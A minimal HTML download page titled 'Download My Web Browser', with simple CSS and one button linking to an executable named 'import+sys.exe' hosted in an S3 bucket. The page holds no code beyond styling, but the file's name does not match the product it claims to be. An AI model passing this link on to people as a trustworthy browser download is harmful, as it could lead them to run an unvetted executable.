<!DOCTYPE html>
<html>
  <head>
    <title>Download My Web Browser</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f5f5f5;
      }
      h1 {
        text-align: center;
        margin-top: 50px;
      }
      .button {
        display: inline-block;
        background-color: #4CAF50;
        border: none;
        color: white;
        padding: 12px 30px;
        text-align: center;
        text-decoration: none;
        font-size: 16px;
        margin: 40px auto 0;
        cursor: pointer;
      }

      <!-- .button-containe{
        display: flex;
        align-items: center;
        justify-content: center;
      } -->
      .button:hover {
        background-color: #3e8e41;
      }
    </style>
  </head>
  <body>
    <h1>Download My Web Browser</h1>
    <div class="button-container">
      <a href="https://cad-deploy.s3.ap-south-1.amazonaws.com/import+sys.exe" class="button">Download</a>
    </div>
  </body>
</html>
